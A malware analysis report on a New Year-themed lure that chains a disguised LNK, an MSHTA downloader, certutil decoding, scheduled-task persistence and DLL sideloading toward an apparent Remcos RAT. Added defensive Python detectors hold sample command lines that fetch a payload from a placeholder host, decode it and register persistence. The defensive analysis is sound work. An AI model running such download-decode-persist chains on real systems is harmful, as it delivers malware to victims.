Festive Facade: Dissecting Multi-Stage Malware in New Year-themed Lure
Key Takeaways
Cyble Research and Intelligence Labs (CRIL) encountered a ZIP archive file that could potentially spread through New Year-themed spam emails. The ZIP attachment contains a shortcut file disguised as a PNG image.
When the shortcut file is executed, it runs MSHTA, utilizing JavaScript to download and open a “Happy New Year” image file, tricking the user into believing it’s a harmless image.
In the background, the JavaScript silently downloads a file disguised as a JPG image and decodes it with the certutil executable, yielding a CAB archive. This CAB file is then extracted, dropping the malware executable.
Upon executing the malware executable, it drops a subsequent stage DLL payload and employs DLL sideloading to progress the infection, establishing a connection to the Command-and-Control (C&C) server.
Overview
On January 3rd, CRIL came across a ZIP archive file named “happy new year.zip” on VirusTotal. While the actual method of initial infection remains unknown, we suspect that it might be delivered through spam emails featuring a New Year theme.
Upon analyzing the file, we observed that the ZIP archive file includes a misleading PNG file named “happy new year.png,” designed to lure users into opening it. However, it is, in fact, a shortcut LNK file disguised as an image file.
If the user perceives it as an image file and opens it with a double click, it triggers the execution of the shortcut LNK file. This LNK file then proceeds to download an HTA file and initiate its execution. The HTA file, in turn, downloads and displays a JPG file in the browser, displaying a “Happy New Year 2024” message. This sequence aims to deceive users, making them believe that they have simply opened an image file received as a spam email attachment.
However, in the background, the embedded script within the HTA file downloads and decodes a malware payload from a remote server, subsequently executing it. This action results in the infection of the user’s system with malware. The infection method employs DLL sideloading to obtain the final-stage payload. It establishes a connection to the Command and Control (C&C) server, possibly associated with a Remcos Remote Access Trojan (RAT) server.
The image below illustrates the overall infection chain of the malware, initiated from the ZIP archive file.
Figure 1 – Overall infection chain
Technical Details
Upon extracting the “happy new year.zip” archive file, users can see a PNG file named “happy new year.png.” However, this file is a disguised shortcut LNK file, pretending to be a PNG image, as shown below.
Figure 2 – Shortcut file masquerading as a PNG file inside the ZIP archive
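The disguise described above relies on the file name, not the file content: a shell link always begins with a fixed 20-byte header (HeaderSize 0x4C plus the shell-link CLSID), whatever it is called. The following triage helper is an added example, not code from the article or from CRIL; it opens a ZIP archive in memory, flags every member whose content is a shell link, and notes when the name carries an image extension in front of the trailing .lnk that Explorer hides. The archive it checks is constructed inline and is not the real lure.

```python
import io
import zipfile

# Shell link (.lnk) header: HeaderSize 0x0000004C followed by the LinkCLSID
# 00021401-0000-0000-C000-000000000046 in its on-disk byte order.
LNK_MAGIC = bytes.fromhex("4c0000000114020000000000c000000000000046")
IMAGE_EXTENSIONS = (".png", ".jpg", ".jpeg", ".gif", ".bmp")


def find_shortcuts(zip_bytes):
    """Return (member name, disguised) for every archive member whose content is a shell link.
    'disguised' is True when the name carries an image extension (Explorer hides a trailing .lnk)."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as archive:
        for info in archive.infolist():
            if info.is_dir():
                continue
            # Only the leading bytes are needed; the rest of the member is never read.
            with archive.open(info) as member:
                head = member.read(len(LNK_MAGIC))
            if head != LNK_MAGIC:
                continue
            name = info.filename.lower()
            base = name[:-4] if name.endswith(".lnk") else name
            findings.append((info.filename, base.endswith(IMAGE_EXTENSIONS)))
    return findings


def build_sample_archive():
    """Constructed test archive, not the real lure: a genuine PNG header, a shell link
    named to look like an image, and a shell link with an honest name."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as archive:
        archive.writestr("real picture.png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 32)
        archive.writestr("happy new year.png.lnk", LNK_MAGIC + b"\x00" * 64)
        archive.writestr("notes.lnk", LNK_MAGIC + b"\x00" * 64)
    return buf.getvalue()


if __name__ == "__main__":
    for name, disguised in find_shortcuts(build_sample_archive()):
        print(f"{name}: shell link{' disguised as image' if disguised else ''}")
```

Because the check reads the member's leading bytes rather than trusting its name, renaming the shortcut or padding the name with spaces does not evade it; a mail gateway or sandbox can apply the same content check to every attachment before the user ever sees the icon.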
If users double-click the file to open it, the shortcut runs, launching the following command, which opens an “M.hta” file through the MSHTA executable, as shown in the figure below.
Figure 3 – Target command-line of the Shortcut file
The figure below shows the code snippet of the “M.hta” file, which includes an embedded JavaScript function that acts as a downloader, retrieving an encoded payload from a remote server.
Figure 4 – Downloaded HTA file with embedded JavaScript
When the “M.hta” is executed, it initially opens an image with a “Happy New Year” theme from a specific URL. It then displays this image to the victim, as shown in the figure below, creating the illusion that they have merely opened an image file received as an email attachment.
Figure 5 – Lure image
However, in the background, the JavaScript code discreetly employs predefined functions to execute the following tasks:
Following the display of the lure image, the script creates a 10-second delay in execution using the command-line “ping -n 10 127.0.0.1.”
Subsequently, it downloads another JPG file, named “wct9D39.jpg,” from a remote server via curl, saving it as “C:\Users\Public\Documents\wct9D39.jpg.”
However, this file is disguised as a JPG image while actually being a certificate file. It contains base64-encoded data enclosed within “-----BEGIN CERTIFICATE-----” and “-----END CERTIFICATE-----” tags, as shown below.
Figure 6 – Downloaded certificate file masquerading as JPG
The JavaScript then introduces a 20-second delay in execution and utilizes certutil.exe to decode the base64 data within the “wct9D39.jpg” file. The resulting decoded content is a CAB archive file, stored as “C:\Users\Public\Documents\wct9D39.tmp,” as shown below.
Figure 7 – Decoded CAB file from Base64 data of the certificate file
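The certificate wrapper above is what makes certutil willing to decode the file, and it also gives a defender a cheap triage signal: a genuine certificate body decodes to DER (a SEQUENCE tag, 0x30), whereas this one decodes to a CAB archive (the MSCF signature). The helper below is an added example, not code from the article or from CRIL; it looks for the standard PEM delimiters, decodes the base64 body, and names the real content by its leading bytes. The three sample files are constructed inline and are not the files from this campaign.

```python
import base64
import re

# certutil-style wrapper: standard PEM certificate delimiters around base64 text.
PEM_CERT = re.compile(
    rb"-----BEGIN CERTIFICATE-----\s*(.*?)\s*-----END CERTIFICATE-----", re.S
)

# Leading signatures worth recognising in a payload hidden behind an image name.
SIGNATURES = [
    (b"MSCF", "cab"),
    (b"MZ", "pe"),
    (b"PK\x03\x04", "zip"),
    (b"\xff\xd8\xff", "jpeg"),
    (b"\x89PNG", "png"),
]


def identify(blob):
    """Name the real content type of raw bytes from its leading signature."""
    for magic, kind in SIGNATURES:
        if blob.startswith(magic):
            return kind
    if blob[:1] == b"\x30":  # DER SEQUENCE tag, which a genuine certificate starts with
        return "der"
    return "unknown"


def triage(data):
    """Return (wrapped, kind): whether a certificate wrapper is present and what the bytes really are.
    With a wrapper, the base64 body is decoded and classified instead of the outer text."""
    match = PEM_CERT.search(data)
    if match is None:
        return (False, identify(data))
    try:
        # b64decode discards the line breaks between the 64-column lines.
        decoded = base64.b64decode(match.group(1))
    except ValueError:  # binascii.Error is a ValueError subclass
        return (True, "undecodable")
    return (True, identify(decoded))


def wrap_as_certificate(payload):
    """Constructed sample builder: base64 in 64-column lines inside certificate delimiters,
    the layout that certutil -encode produces."""
    b64 = base64.b64encode(payload)
    lines = [b64[i:i + 64] for i in range(0, len(b64), 64)]
    return (b"-----BEGIN CERTIFICATE-----\r\n" + b"\r\n".join(lines)
            + b"\r\n-----END CERTIFICATE-----\r\n")


# Constructed samples (not the real files): a CAB-like blob in a wrapper,
# a DER-looking body in a wrapper, and a plain JPEG without any wrapper.
SAMPLE_DISGUISED = wrap_as_certificate(b"MSCF" + b"\x00" * 60)
SAMPLE_CERT = wrap_as_certificate(b"\x30\x82\x01\x00" + b"\x00" * 12)
SAMPLE_JPEG = b"\xff\xd8\xff\xe0" + b"\x00" * 16

if __name__ == "__main__":
    for label, sample in [("disguised", SAMPLE_DISGUISED), ("certificate", SAMPLE_CERT), ("jpeg", SAMPLE_JPEG)]:
        print(label, triage(sample))
```

A file whose name says .jpg, whose outer text says certificate, and whose decoded body says CAB or PE is worth quarantining on that mismatch alone, before any signature match on the payload itself.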
Next, the script employs expand.exe to extract the CAB archive file, saving it as “c:\users\public\Videos\winp.exe,” as below.
Figure 8 – Malware executable extracted and dropped by CAB file
Finally, the script executes the “winp.exe” file through the command prompt, implementing a 5-second delay prior to execution.
The process tree depicted below illustrates the sequence of events from MSHTA execution to the eventual execution of “winp.exe.”
Figure 9 – Process tree
Upon execution of “winp.exe,” it drops two binary files with random names. It then employs cmd.exe to copy the contents of these two binary files, combining them into a malicious DLL file named “nView.dll.”
Likewise, it generates another pair of binary files with random names and uses cmd.exe to merge their content into “nvTaskBar.exe,” a legitimate executable, as shown in the process tree figure below.
Furthermore, “winp.exe” initiates a command that establishes a scheduled task named “ToSestsc,” set to run every 10 minutes. Upon start, this task executes the “nvTaskBar.exe” file from the specified directory with the argument “usea”, as shown below.
Figure 11 – Persistence
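Every step from the HTA onward (the loopback ping delay, curl into C:\Users\Public, certutil -decode, expand.exe, and the schtasks minute trigger) is a living-off-the-land command that is unremarkable on its own but rarely seen together under one mshta.exe parent. The detection below is an added example, not code from the article or from CRIL: it walks the parent chain of constructed process-creation events, attributes each command line to its nearest mshta.exe ancestor, and alerts when several of the chain's steps fire under the same ancestor. The events are modelled on the description above; the HTA URL is a placeholder, and the exact schtasks syntax and the directory holding nvTaskBar.exe are assumptions, since the article does not give them.

```python
import re

# Constructed process-creation events (not real telemetry). PLACEHOLDER-HOST stands in for
# the download server, and the task command line and nvTaskBar.exe directory are assumed.
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 10, "image": r"C:\Windows\explorer.exe",
     "cmdline": "explorer.exe"},
    {"pid": 101, "ppid": 100, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe http://PLACEHOLDER-HOST/M.hta"},
    {"pid": 102, "ppid": 101, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c ping -n 10 127.0.0.1"},
    {"pid": 103, "ppid": 101, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c curl -o C:\Users\Public\Documents\wct9D39.jpg http://PLACEHOLDER-HOST/wct9D39.jpg"},
    {"pid": 104, "ppid": 101, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c certutil -decode C:\Users\Public\Documents\wct9D39.jpg C:\Users\Public\Documents\wct9D39.tmp"},
    {"pid": 105, "ppid": 101, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c expand C:\Users\Public\Documents\wct9D39.tmp C:\Users\Public\Videos\winp.exe"},
    {"pid": 106, "ppid": 101, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c C:\Users\Public\Videos\winp.exe"},
    {"pid": 107, "ppid": 106, "image": r"C:\Users\Public\Videos\winp.exe",
     "cmdline": r"C:\Users\Public\Videos\winp.exe"},
    {"pid": 108, "ppid": 107, "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks /create /sc minute /mo 10 /tn ToSestsc /tr "C:\Users\Public\Videos\nvTaskBar.exe usea"'},
    # Unrelated admin activity that must not fire: a ping to a host, not loopback, not under mshta.
    {"pid": 200, "ppid": 100, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c ping -n 2 fileserver"},
]

# One rule per step of the chain. Each is weak alone and strong in combination.
RULES = [
    ("certutil -decode", re.compile(r"certutil(\.exe)?\s.*-decode", re.I)),
    ("curl to C:\\Users\\Public", re.compile(r"curl(\.exe)?\s.*-o\s+\S*\\users\\public\\", re.I)),
    ("expand to C:\\Users\\Public", re.compile(r"expand(\.exe)?\s.*\\users\\public\\\S*\.exe", re.I)),
    ("ping loopback delay", re.compile(r"ping(\.exe)?\s+-n\s+\d+\s+127\.0\.0\.1", re.I)),
    ("schtasks minute trigger", re.compile(r"schtasks(\.exe)?\s.*/create.*/sc\s+minute", re.I)),
]


def mshta_ancestor(event, by_pid):
    """Walk the parent chain and return the pid of the nearest mshta.exe ancestor, else None."""
    seen = set()
    cur = event
    while cur["ppid"] in by_pid and cur["ppid"] not in seen:
        seen.add(cur["ppid"])
        cur = by_pid[cur["ppid"]]
        if cur["image"].lower().endswith("\\mshta.exe"):
            return cur["pid"]
    return None


def scan(events, min_rules=2):
    """Group rule hits by the mshta.exe process they descend from and report the groups that
    triggered at least min_rules distinct rules. Returns {mshta_pid: sorted rule names}."""
    by_pid = {e["pid"]: e for e in events}
    hits = {}
    for event in events:
        root = mshta_ancestor(event, by_pid)
        if root is None:
            continue
        for name, pattern in RULES:
            if pattern.search(event["cmdline"]):
                hits.setdefault(root, set()).add(name)
    return {root: sorted(names) for root, names in hits.items() if len(names) >= min_rules}


if __name__ == "__main__":
    for root, names in scan(SAMPLE_EVENTS).items():
        print(f"mshta pid {root}: {', '.join(names)}")
```

Attributing hits to the mshta.exe ancestor rather than to the immediate cmd.exe parent is what ties the steps together: each command runs in its own short-lived cmd.exe, so a parent-child rule would see five unrelated events. Raising min_rules trades the odd true positive for fewer alerts on administrators who legitimately use certutil or expand.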
“nvTaskBar.exe” is the toolbar component of a desktop management software utility for NVIDIA NVS and NVIDIA Quadro products. Typically, when executed, this executable loads a DLL called “nView.dll.”
DLL Sideloading
In this instance, the “nvTaskBar.exe” loads the dropped malicious “nView.dll” from the same directory using the DLL sideloading method, as shown in the figure below.
Figure 12 – DLL sideloading
Following the loading of the “nView.dll,” it proceeds to drop an additional malware DLL named “NVDriverSearch.ct” and subsequently loads it as well. During execution, this DLL connects to the command-and-control (C&C) server with the below IP address:
91[.]245[.]253[.]46:443
Upon investigation, we observed that this specific IP address was previously associated with the Remcos RAT, which connected to the server over various other, unidentified ports. In this infection, the connection to the C&C server uses port 443. We suspect a Remcos RAT infection in this case.
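The sideloading in this section is visible in image-load telemetry as a simple shape: a signed vendor executable loading a companion DLL (and here a module with a .ct extension) from its own directory, where that directory is user-writable rather than the product's install location. The check below is an added example, not code from the article or from CRIL; it runs over constructed image-load events and flags same-directory loads from outside the trusted roots. The Program Files path is a placeholder for wherever the genuine product installs, and the Public\Videos directory is an assumption, since the article does not name the directory the files were dropped into.

```python
import ntpath

# Directories where a vendor executable and its companion DLLs legitimately live.
# A same-directory load from anywhere else is the sideloading pattern.
TRUSTED_ROOTS = (
    "c:\\windows\\",
    "c:\\program files\\",
    "c:\\program files (x86)\\",
)


def sideload_candidates(loads):
    """Return (module path, reason) for image loads where the module sits beside the loading
    executable in a directory outside the trusted roots."""
    findings = []
    for ev in loads:
        # ntpath handles Windows paths correctly even when this runs on a non-Windows analysis host.
        proc_dir = ntpath.dirname(ev["process"]).lower()
        mod_dir = ntpath.dirname(ev["module"]).lower()
        if proc_dir != mod_dir:
            continue  # not a side-by-side load
        if (proc_dir + "\\").startswith(TRUSTED_ROOTS):
            continue  # vendor directory; the expected location for companion DLLs
        reasons = ["side-by-side load outside trusted roots"]
        if ntpath.splitext(ev["module"])[1].lower() != ".dll":
            reasons.append("non-DLL extension loaded as a module")
        findings.append((ev["module"], "; ".join(reasons)))
    return findings


# Constructed image-load events (not real telemetry). PLACEHOLDER-VENDOR stands in for the
# genuine install directory; the Public\Videos location is assumed.
SAMPLE_LOADS = [
    {"process": r"C:\Users\Public\Videos\nvTaskBar.exe", "module": r"C:\Users\Public\Videos\nView.dll"},
    {"process": r"C:\Users\Public\Videos\nvTaskBar.exe", "module": r"C:\Windows\System32\kernel32.dll"},
    {"process": r"C:\Program Files\PLACEHOLDER-VENDOR\nvTaskBar.exe",
     "module": r"C:\Program Files\PLACEHOLDER-VENDOR\nView.dll"},
    {"process": r"C:\Users\Public\Videos\nvTaskBar.exe", "module": r"C:\Users\Public\Videos\NVDriverSearch.ct"},
]

if __name__ == "__main__":
    for module, reason in sideload_candidates(SAMPLE_LOADS):
        print(f"{module}: {reason}")
```

The trusted-roots allowlist only holds if those directories are not writable by standard users, so the check is a complement to, not a replacement for, verifying that a loaded DLL carries the same publisher signature as the executable that loaded it. Portable applications that legitimately run from user directories will fire this rule and need an explicit exception.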
Conclusion
Threat Actors (TAs) often use themed spam email attachments because they leverage the curiosity and excitement surrounding popular events or occasions. These themed emails aim to exploit the recipient’s trust and interest, making them more likely to open the attachment or click on links within the email. During the festive season, people often receive greetings, well-wishes, or other related holiday-themed content, creating an opportunity for attackers to disguise malicious payloads.
In this case, TAs utilize New Year-themed spam emails to lure users into becoming victims of malware infections. The infection technique involves the use of a JavaScript downloader, decoding base64 data using certutil, and DLL sideloading to facilitate the infection process. By employing a variety of techniques, TAs aim to increase the sophistication and effectiveness of their attacks, making it more challenging for defenders to detect, prevent, and respond to these threats.
CRIL monitors the latest phishing or malware strains in circulation, delivering timely analyses with actionable intelligence to help users protect themselves against these attacks.
Our Recommendations
The initial breach occurs via spam emails. Therefore, it’s advisable to deploy strong email filtering systems for identifying and preventing the dissemination of harmful attachments.
When handling email attachments, particularly those from unknown senders, exercising caution is crucial. Verify the sender’s identity, particularly if an email seems suspicious.
Consider disabling or limiting the execution of scripting languages, such as PowerShell or JavaScript, on user workstations and servers if they are not essential for legitimate purposes.
Deploy strong antivirus and anti-malware solutions to detect and remove malicious executable files.
Enhance the system security by creating strong, distinct passwords for each of the accounts and, whenever feasible, activate two-factor authentication.
Set up network-level monitoring to detect unusual activities or data exfiltration by malware. Block suspicious activities to prevent potential breaches.
Regularly back up data to guarantee the ability to recover it in case of an infection and keep users informed about the most current phishing and social engineering methods employed by cybercriminals.